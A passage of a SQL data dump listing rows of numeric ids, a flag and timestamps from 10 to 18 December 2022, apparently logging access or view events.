17:57:03'),(65870,1582,1,'2022-12-10','2022-12-10 17:59:54'),(65871,2503,1,'2022-12-10','2022-12-10 18:12:51'),(65872,4238,1,'2022-12-10','2022-12-10 18:28:21'),(65873,1544,1,'2022-12-10','2022-12-10 18:38:02'),(65874,72,1,'2022-12-10','2022-12-10 19:11:25'),(65875,485,1,'2022-12-10','2022-12-10 19:13:23'),(65876,1602,1,'2022-12-10','2022-12-10 20:36:08'),(65877,1602,1,'2022-12-10','2022-12-10 20:37:28'),(65878,4944,1,'2022-12-10','2022-12-10 20:41:25'),(65879,1612,1,'2022-12-10','2022-12-10 20:54:38'),(65880,4457,1,'2022-12-10','2022-12-10 21:21:30'),(65881,87,1,'2022-12-10','2022-12-10 22:00:06'),(65882,1582,1,'2022-12-10','2022-12-10 22:17:22'),(65883,468,1,'2022-12-10','2022-12-10 22:24:23'),(65884,1582,1,'2022-12-10','2022-12-10 22:29:05'),(65885,2991,1,'2022-12-10','2022-12-10 22:29:48'),(65886,4363,1,'2022-12-10','2022-12-10 22:36:45'),(65887,2775,1,'2022-12-10','2022-12-10 22:49:51'),(65888,80,1,'2022-12-10','2022-12-10 22:57:20'),(65889,1586,1,'2022-12-10','2022-12-10 23:02:06'),(65890,469,1,'2022-12-11','2022-12-11 00:23:05'),(65891,469,1,'2022-12-11','2022-12-11 00:24:23'),(65892,1614,1,'2022-12-11','2022-12-11 01:38:44'),(65893,4363,1,'2022-12-11','2022-12-11 02:41:38'),(65894,1582,1,'2022-12-11','2022-12-11 03:26:09'),(65895,4363,1,'2022-12-11','2022-12-11 04:16:26'),(65896,4485,1,'2022-12-11','2022-12-11 05:20:20'),(65897,469,1,'2022-12-11','2022-12-11 05:41:27'),(65898,3721,1,'2022-12-11','2022-12-11 06:50:22'),(65899,4363,1,'2022-12-11','2022-12-11 06:52:25'),(65900,1778,1,'2022-12-11','2022-12-11 07:38:43'),(65901,1596,1,'2022-12-11','2022-12-11 08:56:52'),(65902,1596,1,'2022-12-11','2022-12-11 08:57:01'),(65903,4363,1,'2022-12-11','2022-12-11 09:07:14'),(65904,4542,1,'2022-12-11','2022-12-11 11:05:15'),(65905,1582,1,'2022-12-11','2022-12-11 11:07:13'),(65906,76,1,'2022-12-11','2022-12-11 11:13:13'),(65907,1582,1,'2022-12-11','2022-12-11 11:13:26'),(65908,1582,1,'2022-12-11','2022-12-11 11:13:50'),(65909,1612,1,'2022-12-11','2022-12-11 11:39:18'),(65910,5163,1,'2022-12-11','2022-12-11 11:53:13'),(65911,5163,1,'2022-12-11','2022-12-11 11:54:50'),(65912,4709,1,'2022-12-11','2022-12-11 11:59:20'),(65913,4416,1,'2022-12-11','2022-12-11 12:16:58'),(65914,3273,1,'2022-12-11','2022-12-11 13:14:20'),(65915,1586,1,'2022-12-11','2022-12-11 14:39:20'),(65916,4776,1,'2022-12-11','2022-12-11 14:57:55'),(65917,4911,1,'2022-12-11','2022-12-11 15:15:59'),(65918,1602,1,'2022-12-11','2022-12-11 16:33:48'),(65919,1608,1,'2022-12-11','2022-12-11 16:36:47'),(65920,1596,1,'2022-12-11','2022-12-11 16:57:57'),(65921,4238,1,'2022-12-11','2022-12-11 18:11:18'),(65922,3083,1,'2022-12-11','2022-12-11 18:13:29'),(65923,4363,1,'2022-12-11','2022-12-11 18:16:30'),(65924,3180,1,'2022-12-11','2022-12-11 18:36:00'),(65925,1592,1,'2022-12-11','2022-12-11 18:39:26'),(65926,2775,1,'2022-12-11','2022-12-11 18:56:19'),(65927,3004,1,'2022-12-11','2022-12-11 18:59:23'),(65928,76,1,'2022-12-11','2022-12-11 18:59:41'),(65929,108,1,'2022-12-11','2022-12-11 19:00:44'),(65930,76,1,'2022-12-11','2022-12-11 19:01:47'),(65931,3004,1,'2022-12-11','2022-12-11 19:01:59'),(65932,1596,1,'2022-12-11','2022-12-11 19:20:49'),(65933,1596,1,'2022-12-11','2022-12-11 19:20:50'),(65934,1596,1,'2022-12-11','2022-12-11 19:20:53'),(65935,570,1,'2022-12-11','2022-12-11 20:08:17'),(65936,1586,1,'2022-12-11','2022-12-11 20:23:10'),(65937,2769,1,'2022-12-11','2022-12-11 20:28:31'),(65938,1596,1,'2022-12-11','2022-12-11 20:53:52'),(65939,1596,1,'2022-12-11','2022-12-11 20:53:59'),(65940,2911,1,'2022-12-11','2022-12-11 21:14:32'),(65941,1598,1,'2022-12-11','2022-12-11 21:19:21'),(65942,3273,1,'2022-12-11','2022-12-11 22:04:38'),(65943,1596,1,'2022-12-11','2022-12-11 22:16:46'),(65944,1586,1,'2022-12-11','2022-12-11 22:21:12'),(65945,1586,1,'2022-12-11','2022-12-11 22:21:15'),(65946,1598,1,'2022-12-11','2022-12-11 22:31:05'),(65947,1598,1,'2022-12-11','2022-12-11 22:32:44'),(65948,3004,1,'2022-12-11','2022-12-11 22:37:08'),(65949,1745,1,'2022-12-11','2022-12-11 22:44:46'),(65950,3735,1,'2022-12-11','2022-12-11 23:58:29'),(65951,4457,1,'2022-12-12','2022-12-12 00:31:34'),(65952,3030,1,'2022-12-12','2022-12-12 01:52:25'),(65953,1602,1,'2022-12-12','2022-12-12 02:44:09'),(65954,3083,1,'2022-12-12','2022-12-12 03:06:11'),(65955,5163,1,'2022-12-12','2022-12-12 03:22:50'),(65956,76,1,'2022-12-12','2022-12-12 03:32:08'),(65957,87,1,'2022-12-12','2022-12-12 03:33:26'),(65958,89,1,'2022-12-12','2022-12-12 03:34:39'),(65959,89,1,'2022-12-12','2022-12-12 03:36:07'),(65960,4930,1,'2022-12-12','2022-12-12 03:36:38'),(65961,84,1,'2022-12-12','2022-12-12 03:37:39'),(65962,108,1,'2022-12-12','2022-12-12 03:38:49'),(65963,80,1,'2022-12-12','2022-12-12 03:39:47'),(65964,80,1,'2022-12-12','2022-12-12 03:40:10'),(65965,108,1,'2022-12-12','2022-12-12 03:40:14'),(65966,84,1,'2022-12-12','2022-12-12 03:40:18'),(65967,4930,1,'2022-12-12','2022-12-12 03:40:20'),(65968,89,1,'2022-12-12','2022-12-12 03:40:22'),(65969,89,1,'2022-12-12','2022-12-12 03:40:24'),(65970,87,1,'2022-12-12','2022-12-12 03:40:26'),(65971,76,1,'2022-12-12','2022-12-12 03:40:27'),(65972,5163,1,'2022-12-12','2022-12-12 03:40:29'),(65973,5163,1,'2022-12-12','2022-12-12 03:40:58'),(65974,2658,1,'2022-12-12','2022-12-12 04:07:16'),(65975,80,1,'2022-12-12','2022-12-12 04:15:05'),(65976,3287,1,'2022-12-12','2022-12-12 05:18:24'),(65977,5140,1,'2022-12-12','2022-12-12 05:34:50'),(65978,4911,1,'2022-12-12','2022-12-12 07:13:53'),(65979,4587,1,'2022-12-12','2022-12-12 07:31:45'),(65980,4587,1,'2022-12-12','2022-12-12 07:35:53'),(65981,1612,1,'2022-12-12','2022-12-12 08:01:01'),(65982,4960,1,'2022-12-12','2022-12-12 08:16:39'),(65983,4238,1,'2022-12-12','2022-12-12 08:57:26'),(65984,1544,1,'2022-12-12','2022-12-12 09:45:21'),(65985,108,1,'2022-12-12','2022-12-12 10:49:08'),(65986,4960,1,'2022-12-12','2022-12-12 10:49:34'),(65987,4960,1,'2022-12-12','2022-12-12 10:49:39'),(65988,3030,1,'2022-12-12','2022-12-12 10:50:16'),(65989,1586,1,'2022-12-12','2022-12-12 11:07:21'),(65990,1608,1,'2022-12-12','2022-12-12 11:32:18'),(65991,5163,1,'2022-12-12','2022-12-12 11:41:09'),(65992,3714,1,'2022-12-12','2022-12-12 11:45:34'),(65993,4412,1,'2022-12-12','2022-12-12 11:49:32'),(65994,470,1,'2022-12-12','2022-12-12 11:53:29'),(65995,1600,1,'2022-12-12','2022-12-12 12:11:47'),(65996,80,1,'2022-12-12','2022-12-12 12:26:59'),(65997,80,1,'2022-12-12','2022-12-12 12:30:02'),(65998,5071,1,'2022-12-12','2022-12-12 12:40:34'),(65999,91,1,'2022-12-12','2022-12-12 13:27:44'),(66000,4591,1,'2022-12-12','2022-12-12 13:30:11'),(66001,91,1,'2022-12-12','2022-12-12 13:30:37'),(66002,4587,1,'2022-12-12','2022-12-12 13:31:45'),(66003,5071,1,'2022-12-12','2022-12-12 13:45:36'),(66004,80,1,'2022-12-12','2022-12-12 14:01:35'),(66005,1600,1,'2022-12-12','2022-12-12 14:01:40'),(66006,4412,1,'2022-12-12','2022-12-12 14:23:05'),(66007,4960,1,'2022-12-12','2022-12-12 14:38:26'),(66008,80,1,'2022-12-12','2022-12-12 14:43:33'),(66009,4960,1,'2022-12-12','2022-12-12 14:46:37'),(66010,1594,1,'2022-12-12','2022-12-12 14:50:35'),(66011,1728,1,'2022-12-12','2022-12-12 14:57:55'),(66012,1612,1,'2022-12-12','2022-12-12 15:12:22'),(66013,76,1,'2022-12-12','2022-12-12 15:13:22'),(66014,1612,1,'2022-12-12','2022-12-12 15:14:13'),(66015,5020,1,'2022-12-12','2022-12-12 15:48:39'),(66016,1594,1,'2022-12-12','2022-12-12 16:37:08'),(66017,5157,1,'2022-12-12','2022-12-12 17:13:50'),(66018,4960,1,'2022-12-12','2022-12-12 19:49:23'),(66019,1544,1,'2022-12-12','2022-12-12 19:51:59'),(66020,108,1,'2022-12-12','2022-12-12 19:52:02'),(66021,5163,1,'2022-12-12','2022-12-12 20:14:15'),(66022,68,1,'2022-12-12','2022-12-12 20:14:31'),(66023,3479,1,'2022-12-12','2022-12-12 20:21:25'),(66024,4960,1,'2022-12-12','2022-12-12 20:43:34'),(66025,467,1,'2022-12-12','2022-12-12 21:06:25'),(66026,3271,1,'2022-12-12','2022-12-12 21:06:38'),(66027,467,1,'2022-12-12','2022-12-12 21:22:12'),(66028,1722,1,'2022-12-12','2022-12-12 21:50:01'),(66029,1590,1,'2022-12-12','2022-12-12 21:51:02'),(66030,2395,1,'2022-12-12','2022-12-12 22:31:54'),(66031,76,1,'2022-12-12','2022-12-12 22:36:28'),(66032,76,1,'2022-12-12','2022-12-12 23:03:24'),(66033,4329,1,'2022-12-12','2022-12-12 23:08:46'),(66034,1782,1,'2022-12-12','2022-12-12 23:21:07'),(66035,469,1,'2022-12-12','2022-12-12 23:43:58'),(66036,5163,1,'2022-12-13','2022-12-13 01:13:40'),(66037,1751,1,'2022-12-13','2022-12-13 02:31:51'),(66038,1544,1,'2022-12-13','2022-12-13 03:28:03'),(66039,3313,1,'2022-12-13','2022-12-13 03:28:53'),(66040,4457,1,'2022-12-13','2022-12-13 03:43:48'),(66041,1544,1,'2022-12-13','2022-12-13 05:04:59'),(66042,108,1,'2022-12-13','2022-12-13 05:06:15'),(66043,467,1,'2022-12-13','2022-12-13 05:48:37'),(66044,478,1,'2022-12-13','2022-12-13 06:33:45'),(66045,1584,1,'2022-12-13','2022-12-13 06:34:06'),(66046,3721,1,'2022-12-13','2022-12-13 06:34:11'),(66047,4485,1,'2022-12-13','2022-12-13 06:34:23'),(66048,1594,1,'2022-12-13','2022-12-13 08:16:00'),(66049,4703,1,'2022-12-13','2022-12-13 08:19:42'),(66050,5163,1,'2022-12-13','2022-12-13 09:25:14'),(66051,1614,1,'2022-12-13','2022-12-13 09:30:25'),(66052,2813,1,'2022-12-13','2022-12-13 09:42:11'),(66053,1602,1,'2022-12-13','2022-12-13 09:51:08'),(66054,2813,1,'2022-12-13','2022-12-13 10:21:23'),(66055,2813,1,'2022-12-13','2022-12-13 10:22:53'),(66056,1728,1,'2022-12-13','2022-12-13 10:24:09'),(66057,2148,1,'2022-12-13','2022-12-13 10:25:02'),(66058,2911,1,'2022-12-13','2022-12-13 10:29:32'),(66059,1602,1,'2022-12-13','2022-12-13 10:30:42'),(66060,80,1,'2022-12-13','2022-12-13 10:31:00'),(66061,2813,1,'2022-12-13','2022-12-13 10:31:00'),(66062,1602,1,'2022-12-13','2022-12-13 10:32:55'),(66063,4960,1,'2022-12-13','2022-12-13 10:47:38'),(66064,4963,1,'2022-12-13','2022-12-13 10:54:07'),(66065,68,1,'2022-12-13','2022-12-13 10:55:20'),(66066,4963,1,'2022-12-13','2022-12-13 10:55:57'),(66067,4963,1,'2022-12-13','2022-12-13 10:56:43'),(66068,72,1,'2022-12-13','2022-12-13 10:57:43'),(66069,4963,1,'2022-12-13','2022-12-13 10:58:16'),(66070,76,1,'2022-12-13','2022-12-13 10:58:26'),(66071,80,1,'2022-12-13','2022-12-13 10:58:57'),(66072,470,1,'2022-12-13','2022-12-13 11:18:18'),(66073,3313,1,'2022-12-13','2022-12-13 11:19:48'),(66074,4436,1,'2022-12-13','2022-12-13 11:29:12'),(66075,5062,1,'2022-12-13','2022-12-13 11:39:06'),(66076,1588,1,'2022-12-13','2022-12-13 11:58:45'),(66077,2704,1,'2022-12-13','2022-12-13 11:59:16'),(66078,1588,1,'2022-12-13','2022-12-13 11:59:24'),(66079,1606,1,'2022-12-13','2022-12-13 12:21:59'),(66080,1600,1,'2022-12-13','2022-12-13 12:52:34'),(66081,4412,1,'2022-12-13','2022-12-13 13:04:37'),(66082,470,1,'2022-12-13','2022-12-13 13:09:53'),(66083,1594,1,'2022-12-13','2022-12-13 13:29:30'),(66084,4412,1,'2022-12-13','2022-12-13 13:32:25'),(66085,1544,1,'2022-12-13','2022-12-13 13:47:35'),(66086,1594,1,'2022-12-13','2022-12-13 14:00:07'),(66087,1614,1,'2022-12-13','2022-12-13 14:12:45'),(66088,4448,1,'2022-12-13','2022-12-13 14:19:47'),(66089,3691,1,'2022-12-13','2022-12-13 14:53:04'),(66090,2309,1,'2022-12-13','2022-12-13 15:34:02'),(66091,1612,1,'2022-12-13','2022-12-13 16:00:45'),(66092,76,1,'2022-12-13','2022-12-13 17:07:00'),(66093,2964,1,'2022-12-13','2022-12-13 17:30:07'),(66094,91,1,'2022-12-13','2022-12-13 19:23:23'),(66095,91,1,'2022-12-13','2022-12-13 19:23:39'),(66096,4587,1,'2022-12-13','2022-12-13 19:24:17'),(66097,5163,1,'2022-12-13','2022-12-13 19:56:11'),(66098,4950,1,'2022-12-13','2022-12-13 20:28:58'),(66099,4341,1,'2022-12-13','2022-12-13 21:14:07'),(66100,472,1,'2022-12-13','2022-12-13 22:31:55'),(66101,3781,1,'2022-12-13','2022-12-13 23:28:51'),(66102,4741,1,'2022-12-13','2022-12-13 23:37:54'),(66103,1612,1,'2022-12-13','2022-12-13 23:58:50'),(66104,3664,1,'2022-12-14','2022-12-14 01:01:11'),(66105,76,1,'2022-12-14','2022-12-14 01:29:40'),(66106,4408,1,'2022-12-14','2022-12-14 01:53:23'),(66107,1870,1,'2022-12-14','2022-12-14 02:03:40'),(66108,72,1,'2022-12-14','2022-12-14 02:03:42'),(66109,2411,1,'2022-12-14','2022-12-14 02:10:48'),(66110,5163,1,'2022-12-14','2022-12-14 02:30:33'),(66111,72,1,'2022-12-14','2022-12-14 02:38:01'),(66112,3721,1,'2022-12-14','2022-12-14 03:01:54'),(66113,2411,1,'2022-12-14','2022-12-14 04:04:21'),(66114,1600,1,'2022-12-14','2022-12-14 04:24:23'),(66115,2161,1,'2022-12-14','2022-12-14 04:24:24'),(66116,4542,1,'2022-12-14','2022-12-14 04:26:42'),(66117,468,1,'2022-12-14','2022-12-14 04:39:42'),(66118,91,1,'2022-12-14','2022-12-14 04:40:12'),(66119,4893,1,'2022-12-14','2022-12-14 04:41:11'),(66120,91,1,'2022-12-14','2022-12-14 04:54:32'),(66121,4457,1,'2022-12-14','2022-12-14 05:10:44'),(66122,4542,1,'2022-12-14','2022-12-14 05:20:19'),(66123,1610,1,'2022-12-14','2022-12-14 06:20:11'),(66124,3777,1,'2022-12-14','2022-12-14 07:05:04'),(66125,1612,1,'2022-12-14','2022-12-14 08:34:54'),(66126,80,1,'2022-12-14','2022-12-14 08:38:30'),(66127,3777,1,'2022-12-14','2022-12-14 08:45:35'),(66128,3090,1,'2022-12-14','2022-12-14 09:09:01'),(66129,1600,1,'2022-12-14','2022-12-14 09:13:49'),(66130,1600,1,'2022-12-14','2022-12-14 09:21:01'),(66131,5080,1,'2022-12-14','2022-12-14 09:49:28'),(66132,4436,1,'2022-12-14','2022-12-14 10:49:57'),(66133,1722,1,'2022-12-14','2022-12-14 12:07:38'),(66134,1612,1,'2022-12-14','2022-12-14 12:07:44'),(66135,1594,1,'2022-12-14','2022-12-14 12:15:10'),(66136,1600,1,'2022-12-14','2022-12-14 13:13:03'),(66137,3307,1,'2022-12-14','2022-12-14 13:58:06'),(66138,4587,1,'2022-12-14','2022-12-14 14:24:08'),(66139,4341,1,'2022-12-14','2022-12-14 14:34:56'),(66140,1612,1,'2022-12-14','2022-12-14 15:45:13'),(66141,1614,1,'2022-12-14','2022-12-14 16:12:15'),(66142,3280,1,'2022-12-14','2022-12-14 16:26:13'),(66143,1600,1,'2022-12-14','2022-12-14 16:44:29'),(66144,4977,1,'2022-12-14','2022-12-14 16:49:56'),(66145,1770,1,'2022-12-14','2022-12-14 16:57:53'),(66146,5140,1,'2022-12-14','2022-12-14 17:09:50'),(66147,2617,1,'2022-12-14','2022-12-14 18:19:56'),(66148,1582,1,'2022-12-14','2022-12-14 18:22:51'),(66149,3273,1,'2022-12-14','2022-12-14 20:34:54'),(66150,4976,1,'2022-12-14','2022-12-14 20:37:21'),(66151,1582,1,'2022-12-14','2022-12-14 21:13:54'),(66152,5122,1,'2022-12-14','2022-12-14 22:55:04'),(66153,5163,1,'2022-12-14','2022-12-14 23:10:43'),(66154,335,1,'2022-12-14','2022-12-14 23:15:09'),(66155,74,1,'2022-12-14','2022-12-14 23:16:52'),(66156,4930,1,'2022-12-14','2022-12-14 23:18:11'),(66157,4966,1,'2022-12-14','2022-12-14 23:21:01'),(66158,4930,1,'2022-12-14','2022-12-14 23:22:18'),(66159,4963,1,'2022-12-14','2022-12-14 23:22:21'),(66160,4963,1,'2022-12-14','2022-12-14 23:23:15'),(66161,4930,1,'2022-12-14','2022-12-14 23:23:17'),(66162,4950,1,'2022-12-14','2022-12-14 23:23:32'),(66163,3307,1,'2022-12-15','2022-12-15 00:19:24'),(66164,4709,1,'2022-12-15','2022-12-15 01:04:17'),(66165,4944,1,'2022-12-15','2022-12-15 01:41:42'),(66166,3079,1,'2022-12-15','2022-12-15 01:49:20'),(66167,3664,1,'2022-12-15','2022-12-15 01:51:21'),(66168,5248,1,'2022-12-15','2022-12-15 04:12:51'),(66169,1768,1,'2022-12-15','2022-12-15 05:09:55'),(66170,2309,1,'2022-12-15','2022-12-15 06:19:16'),(66171,5163,1,'2022-12-15','2022-12-15 07:40:08'),(66172,3004,1,'2022-12-15','2022-12-15 08:14:44'),(66173,3006,1,'2022-12-15','2022-12-15 08:17:36'),(66174,3004,1,'2022-12-15','2022-12-15 08:18:09'),(66175,4485,1,'2022-12-15','2022-12-15 08:28:33'),(66176,68,1,'2022-12-15','2022-12-15 08:43:40'),(66177,1588,1,'2022-12-15','2022-12-15 08:58:45'),(66178,4301,1,'2022-12-15','2022-12-15 09:29:55'),(66179,3781,1,'2022-12-15','2022-12-15 09:29:57'),(66180,3004,1,'2022-12-15','2022-12-15 09:31:51'),(66181,3124,1,'2022-12-15','2022-12-15 09:43:40'),(66182,1588,1,'2022-12-15','2022-12-15 10:25:56'),(66183,3072,1,'2022-12-15','2022-12-15 10:36:46'),(66184,3109,1,'2022-12-15','2022-12-15 10:39:34'),(66185,4980,1,'2022-12-15','2022-12-15 10:53:18'),(66186,91,1,'2022-12-15','2022-12-15 11:10:16'),(66187,4496,1,'2022-12-15','2022-12-15 11:25:17'),(66188,3764,1,'2022-12-15','2022-12-15 11:27:56'),(66189,4566,1,'2022-12-15','2022-12-15 11:43:51'),(66190,4674,1,'2022-12-15','2022-12-15 11:46:07'),(66191,1774,1,'2022-12-15','2022-12-15 11:49:21'),(66192,4685,1,'2022-12-15','2022-12-15 12:07:40'),(66193,5163,1,'2022-12-15','2022-12-15 12:24:35'),(66194,4556,1,'2022-12-15','2022-12-15 12:27:15'),(66195,3267,1,'2022-12-15','2022-12-15 12:42:20'),(66196,80,1,'2022-12-15','2022-12-15 12:48:42'),(66197,1594,1,'2022-12-15','2022-12-15 13:07:29'),(66198,3307,1,'2022-12-15','2022-12-15 13:41:14'),(66199,1582,1,'2022-12-15','2022-12-15 14:03:46'),(66200,1586,1,'2022-12-15','2022-12-15 14:32:17'),(66201,76,1,'2022-12-15','2022-12-15 14:51:36'),(66202,3585,1,'2022-12-15','2022-12-15 15:09:41'),(66203,1610,1,'2022-12-15','2022-12-15 15:13:33'),(66204,4938,1,'2022-12-15','2022-12-15 15:18:38'),(66205,1544,1,'2022-12-15','2022-12-15 15:21:32'),(66206,4930,1,'2022-12-15','2022-12-15 15:21:44'),(66207,68,1,'2022-12-15','2022-12-15 15:23:26'),(66208,4496,1,'2022-12-15','2022-12-15 15:30:59'),(66209,1544,1,'2022-12-15','2022-12-15 15:42:32'),(66210,5163,1,'2022-12-15','2022-12-15 16:46:00'),(66211,4591,1,'2022-12-15','2022-12-15 16:56:47'),(66212,4703,1,'2022-12-15','2022-12-15 17:17:16'),(66213,4963,1,'2022-12-15','2022-12-15 17:26:27'),(66214,1722,1,'2022-12-15','2022-12-15 17:40:23'),(66215,68,1,'2022-12-15','2022-12-15 17:42:56'),(66216,3534,1,'2022-12-15','2022-12-15 17:46:27'),(66217,2658,1,'2022-12-15','2022-12-15 19:07:11'),(66218,91,1,'2022-12-15','2022-12-15 19:33:18'),(66219,80,1,'2022-12-15','2022-12-15 19:48:53'),(66220,3781,1,'2022-12-15','2022-12-15 20:48:44'),(66221,1766,1,'2022-12-15','2022-12-15 20:50:43'),(66222,4776,1,'2022-12-15','2022-12-15 23:32:13'),(66223,3664,1,'2022-12-16','2022-12-16 00:37:22'),(66224,3430,1,'2022-12-16','2022-12-16 00:47:47'),(66225,4674,1,'2022-12-16','2022-12-16 00:58:19'),(66226,3090,1,'2022-12-16','2022-12-16 01:21:12'),(66227,1724,1,'2022-12-16','2022-12-16 01:28:18'),(66228,76,1,'2022-12-16','2022-12-16 01:36:44'),(66229,1724,1,'2022-12-16','2022-12-16 01:38:34'),(66230,1724,1,'2022-12-16','2022-12-16 02:01:24'),(66231,4776,1,'2022-12-16','2022-12-16 02:14:37'),(66232,4668,1,'2022-12-16','2022-12-16 02:46:42'),(66233,68,1,'2022-12-16','2022-12-16 02:52:54'),(66234,2297,1,'2022-12-16','2022-12-16 02:52:56'),(66235,1724,1,'2022-12-16','2022-12-16 03:05:10'),(66236,87,1,'2022-12-16','2022-12-16 03:08:27'),(66237,1724,1,'2022-12-16','2022-12-16 03:31:47'),(66238,4685,1,'2022-12-16','2022-12-16 03:42:43'),(66239,4703,1,'2022-12-16','2022-12-16 03:45:33'),(66240,91,1,'2022-12-16','2022-12-16 04:22:54'),(66241,4668,1,'2022-12-16','2022-12-16 04:23:01'),(66242,4930,1,'2022-12-16','2022-12-16 06:13:56'),(66243,4457,1,'2022-12-16','2022-12-16 06:22:27'),(66244,2159,1,'2022-12-16','2022-12-16 06:49:58'),(66245,4966,1,'2022-12-16','2022-12-16 07:07:05'),(66246,4966,1,'2022-12-16','2022-12-16 07:07:37'),(66247,1586,1,'2022-12-16','2022-12-16 07:44:01'),(66248,1739,1,'2022-12-16','2022-12-16 07:56:26'),(66249,1614,1,'2022-12-16','2022-12-16 08:37:07'),(66250,1594,1,'2022-12-16','2022-12-16 08:50:32'),(66251,4963,1,'2022-12-16','2022-12-16 09:59:08'),(66252,1602,1,'2022-12-16','2022-12-16 10:06:57'),(66253,1602,1,'2022-12-16','2022-12-16 10:06:57'),(66254,3313,1,'2022-12-16','2022-12-16 10:14:26'),(66255,487,1,'2022-12-16','2022-12-16 10:35:34'),(66256,486,1,'2022-12-16','2022-12-16 10:36:09'),(66257,487,1,'2022-12-16','2022-12-16 10:36:14'),(66258,3313,1,'2022-12-16','2022-12-16 10:46:47'),(66259,1614,1,'2022-12-16','2022-12-16 11:01:42'),(66260,2813,1,'2022-12-16','2022-12-16 11:07:01'),(66261,68,1,'2022-12-16','2022-12-16 11:09:14'),(66262,80,1,'2022-12-16','2022-12-16 11:09:41'),(66263,1602,1,'2022-12-16','2022-12-16 12:05:49'),(66264,74,1,'2022-12-16','2022-12-16 12:07:11'),(66265,74,1,'2022-12-16','2022-12-16 12:22:36'),(66266,1602,1,'2022-12-16','2022-12-16 12:22:40'),(66267,1594,1,'2022-12-16','2022-12-16 14:23:39'),(66268,76,1,'2022-12-16','2022-12-16 14:24:01'),(66269,4703,1,'2022-12-16','2022-12-16 15:07:35'),(66270,2410,1,'2022-12-16','2022-12-16 15:24:34'),(66271,1724,1,'2022-12-16','2022-12-16 15:56:56'),(66272,2410,1,'2022-12-16','2022-12-16 15:56:58'),(66273,2063,1,'2022-12-16','2022-12-16 15:59:07'),(66274,4747,1,'2022-12-16','2022-12-16 16:15:40'),(66275,4776,1,'2022-12-16','2022-12-16 16:40:43'),(66276,1582,1,'2022-12-16','2022-12-16 16:50:02'),(66277,1610,1,'2022-12-16','2022-12-16 17:07:59'),(66278,1610,1,'2022-12-16','2022-12-16 17:08:12'),(66279,3731,1,'2022-12-16','2022-12-16 17:31:02'),(66280,4963,1,'2022-12-16','2022-12-16 18:15:48'),(66281,2309,1,'2022-12-16','2022-12-16 19:10:38'),(66282,470,1,'2022-12-16','2022-12-16 19:31:24'),(66283,3781,1,'2022-12-16','2022-12-16 19:32:22'),(66284,3781,1,'2022-12-16','2022-12-16 19:32:56'),(66285,3691,1,'2022-12-16','2022-12-16 19:57:10'),(66286,68,1,'2022-12-16','2022-12-16 20:01:30'),(66287,4776,1,'2022-12-16','2022-12-16 20:18:52'),(66288,4524,1,'2022-12-16','2022-12-16 20:18:54'),(66289,4529,1,'2022-12-16','2022-12-16 20:18:55'),(66290,3764,1,'2022-12-16','2022-12-16 20:19:01'),(66291,4802,1,'2022-12-16','2022-12-16 20:46:58'),(66292,4759,1,'2022-12-16','2022-12-16 20:54:59'),(66293,1745,1,'2022-12-16','2022-12-16 21:10:02'),(66294,1594,1,'2022-12-16','2022-12-16 23:47:20'),(66295,487,1,'2022-12-17','2022-12-17 00:58:02'),(66296,4520,1,'2022-12-17','2022-12-17 01:56:17'),(66297,1590,1,'2022-12-17','2022-12-17 02:28:01'),(66298,1720,1,'2022-12-17','2022-12-17 03:13:38'),(66299,3691,1,'2022-12-17','2022-12-17 03:54:16'),(66300,2296,1,'2022-12-17','2022-12-17 04:53:17'),(66301,4569,1,'2022-12-17','2022-12-17 06:09:18'),(66302,4520,1,'2022-12-17','2022-12-17 06:34:42'),(66303,2904,1,'2022-12-17','2022-12-17 07:39:47'),(66304,3742,1,'2022-12-17','2022-12-17 07:50:31'),(66305,4485,1,'2022-12-17','2022-12-17 08:36:10'),(66306,3691,1,'2022-12-17','2022-12-17 08:37:06'),(66307,4688,1,'2022-12-17','2022-12-17 09:34:43'),(66308,479,1,'2022-12-17','2022-12-17 10:19:44'),(66309,4697,1,'2022-12-17','2022-12-17 10:52:04'),(66310,4485,1,'2022-12-17','2022-12-17 11:01:11'),(66311,4569,1,'2022-12-17','2022-12-17 11:04:41'),(66312,4966,1,'2022-12-17','2022-12-17 11:43:16'),(66313,2904,1,'2022-12-17','2022-12-17 11:45:36'),(66314,4457,1,'2022-12-17','2022-12-17 11:57:44'),(66315,3072,1,'2022-12-17','2022-12-17 13:18:02'),(66316,3691,1,'2022-12-17','2022-12-17 15:10:17'),(66317,4608,1,'2022-12-17','2022-12-17 15:10:28'),(66318,4608,1,'2022-12-17','2022-12-17 15:21:36'),(66319,470,1,'2022-12-17','2022-12-17 15:26:50'),(66320,2809,1,'2022-12-17','2022-12-17 16:00:00'),(66321,3691,1,'2022-12-17','2022-12-17 16:39:44'),(66322,1596,1,'2022-12-17','2022-12-17 16:49:11'),(66323,4960,1,'2022-12-17','2022-12-17 17:07:38'),(66324,487,1,'2022-12-17','2022-12-17 17:39:42'),(66325,1877,1,'2022-12-17','2022-12-17 17:50:51'),(66326,1872,1,'2022-12-17','2022-12-17 18:35:43'),(66327,3087,1,'2022-12-17','2022-12-17 18:37:10'),(66328,3060,1,'2022-12-17','2022-12-17 18:43:49'),(66329,1610,1,'2022-12-17','2022-12-17 19:03:19'),(66330,3790,1,'2022-12-17','2022-12-17 19:24:44'),(66331,473,1,'2022-12-17','2022-12-17 22:57:20'),(66332,487,1,'2022-12-17','2022-12-17 23:51:30'),(66333,468,1,'2022-12-18','2022-12-18 00:01:54'),(66334,1544,1,'2022-12-18','2022-12-18 00:11:21'),(66335,474,1,'2022-12-18','2022-12-18 00:12:02'),(66336,470,1,'2022-12-18','2022-12-18 00:22:17'),(66337,4738,1,'2022-12-18','2022-12-18 00:33:06'),(66338,1582,1,'2022-12-18','2022-12-18 01:04:50'),(66339,1582,1,'2022-12-18','2022-12-18 01:08:34'),(66340,4454,1,'2022-12-18','2022-12-18 01:21:32'),(66341,1872,1,'2022-12-18','2022-12-18 03:08:24'),(66342,3691,1,'2022-12-18','2022-12-18 03:16:28'),(66343,1877,1,'2022-12-18','2022-12-18 03:38:28'),(66344,3087,1,'2022-12-18','2022-12-18 03:54:57'),(66345,4681,1,'2022-12-18','2022-12-18 04:08:13'),(66346,4612,1,'2022-12-18','2022-12-18 04:18:41'),(66347,5248,1,'2022-12-18','2022-12-18 04:39:04'),(66348,4622,1,'2022-12-18','2022-12-18 04:40:58'),(66349,4424,1,'2022-12-18','2022-12-18 05:23:12'),(66350,1737,1,'2022-12-18','2022-12-18 05:43:15'),(66351,4408,1,'2022-12-18','2022-12-18 05:47:45'),(66352,5080,1,'2022-12-18','2022-12-18 08:22:32'),(66353,1770,1,'2022-12-18','2022-12-18 08:25:20'),(66354,3092,1,'2022-12-18','2022-12-18 09:29:50'),(66355,4963,1,'2022-12-18','2022-12-18 09:51:58'),(66356,4963,1,'2022-12-18','2022-12-18 